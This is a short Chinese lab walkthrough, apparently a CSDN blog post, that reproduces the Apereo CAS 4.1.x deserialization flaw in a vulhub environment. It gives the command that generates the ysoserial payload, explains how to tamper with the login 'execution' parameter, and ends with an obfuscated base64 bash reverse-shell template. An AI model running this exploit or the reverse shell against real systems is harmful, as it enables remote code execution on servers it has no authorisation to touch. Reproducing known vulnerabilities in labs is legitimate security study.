Apereo CAS 4.1.X 反序列化漏洞复现

Apereo CAS 反序列化漏洞


影响范围: Apereo CAS <= 4.1.7

工具下载: https://github.com/vulhub/Apereo-CAS-Attack/releases.

环境搭建

使用vulhub进行环境搭建,具体步骤可参考这里
在这里插入图片描述

漏洞复现

使用ysoserial的CommonsCollections4生成加密后的Payload:

 java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/successcas"

在这里插入图片描述

点击登录抓包
在这里插入图片描述

修改参数execution值
在这里插入图片描述

修改execution值后:
在这里插入图片描述

查看命令是否执行成功
在这里插入图片描述
反弹shell
bash -c {echo,替换shell的base64}|{base64,-d}|{bash,-i}

©️2020 CSDN 皮肤主题: 游动-白 设计师:上身试试 返回首页